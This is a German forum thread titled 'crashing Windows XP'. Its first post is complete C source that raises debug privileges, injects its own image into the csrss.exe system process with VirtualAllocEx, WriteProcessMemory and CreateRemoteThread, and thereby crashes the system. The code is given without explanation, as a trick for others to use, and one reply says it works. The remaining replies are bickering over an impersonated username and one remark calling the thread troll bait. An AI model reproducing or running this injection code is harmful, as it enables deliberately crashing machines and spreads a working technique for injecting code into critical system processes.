roflers Trickkiste, heute: windows xp crashen

rofler

#include <windows.h>

typedef BOOL (WINAPI *tEnumProcesses)(DWORD*,DWORD,DWORD*);
typedef BOOL (WINAPI *tEnumProcessModules)(HANDLE,HMODULE*,DWORD,LPDWORD);
typedef DWORD (WINAPI *tGetModuleBaseNameA)(HANDLE,HMODULE,LPSTR,DWORD);

typedef int (WINAPI *tMessageBoxA)(HWND,const char*,const char*,UINT);
#define CHADDR(type,x) ((##type)((DWORD)(x) + (DWORD)(hmem) - (DWORD)(hinst)))

tEnumProcesses EnumProcesses;
tEnumProcessModules EnumProcessModules;
tGetModuleBaseNameA GetModuleBaseName;

typedef struct {
    tMessageBoxA pMessageBox;
    char *txt;
} ADDRS;

void HideNT();
DWORD WINAPI Hack(ADDRS*);

ADDRS addrs;
char txt[] = "BSOD";
char s[1024];

void main(void)
{
    HMODULE psapi = LoadLibrary("psapi.dll");
    EnumProcesses = (tEnumProcesses)GetProcAddress(psapi,"EnumProcesses");
    EnumProcessModules = (tEnumProcessModules)GetProcAddress(psapi,"EnumProcessModules");
    GetModuleBaseName = (tGetModuleBaseNameA)GetProcAddress(psapi,"GetModuleBaseNameA");
    if(!EnumProcesses || !EnumProcessModules || !GetModuleBaseName) return;

	HideNT();
	Sleep(100);
	ExitProcess(0);
}

void HideNT()
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tkp;

    memset(&tkp,0,sizeof(tkp));
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
    LookupPrivilegeValue(0,SE_DEBUG_NAME, &tkp.Privileges[0].Luid);
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, 0, 0);

    HMODULE hinst = GetModuleHandle(0);
    IMAGE_NT_HEADERS32 *pe = (IMAGE_NT_HEADERS32*)(((IMAGE_DOS_HEADER*)hinst)->e_lfanew + (DWORD)hinst);
    DWORD size = pe->OptionalHeader.SizeOfImage;
    DWORD wb;

    DWORD n;
    DWORD pr[1024];
    if(!EnumProcesses(pr,sizeof(pr),&n)) return;
    n >>= 2;

    DWORD cpid = GetCurrentProcessId();
    for(int i = 0; i < n; i++)
    {
        if(pr[i] == cpid) continue;
        HANDLE h = OpenProcess(PROCESS_ALL_ACCESS,0,pr[i]);
        if(!h) continue;
        HMODULE mod;
        DWORD nmod;
        EnumProcessModules(h,&mod,4,&nmod);
        GetModuleBaseName(h,mod,s,1023);
        if(lstrcmpi(s,"csrss.exe"))
        {
            CloseHandle(h);
            continue;
        }
        LPVOID hmem = VirtualAllocEx(h,0,size,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);
        if(!hmem)
        {
            CloseHandle(h);
            continue;
        }
        addrs.txt = CHADDR(char*,txt);
        addrs.pMessageBox = MessageBoxA;
        if(!WriteProcessMemory(h,hmem,(LPVOID)hinst,size,&wb))
        {
            VirtualFreeEx(h,hmem,size,MEM_DECOMMIT|MEM_RELEASE);
            CloseHandle(h);
            continue;
        }
        DWORD tid;
        if(!CreateRemoteThread(h,0,0,
            (LPTHREAD_START_ROUTINE)((DWORD)Hack + (DWORD)hmem - (DWORD)hinst),
            (LPVOID)((LPVOID)((DWORD)&addrs - (DWORD)hinst + (DWORD)hmem)),0,&tid))
        {
            VirtualFreeEx(h,hmem,size,MEM_DECOMMIT|MEM_RELEASE);
            CloseHandle(h);
        }
    }
}

DWORD WINAPI Hack(ADDRS *a)
{
    return a->pMessageBox(0,a->txt,a->txt,0);
}

rofler

Es tut mir leid, Leute ich bin so blöd! Bitte verzeiht mir meine unendliche Ignoranz!

rofler

rofler schrieb:

Es tut mir leid, Leute ich bin so blöd! Bitte verzeiht mir meine unendliche Ignoranz!

Bla, fake mich nicht, die Beiträge vom echten rofler (mir) zeugen von Intelligenz. Die Beiträge solcher Faker wie du hingegen zeugen höchstens von intellektueller Armut, also lass es Merker

Machine

registrieren soll helfen

Nutzer des Codes

Klappt einmannfrei! Vielen Dank rofler.

Elektronix

Hmm, ein Codeschnipsel ohne Kommentare, ohne Frage, dann Kommentare ohne Bezug-
Irgendwie kommt mir das alles hier nur wie Trollfutter vor.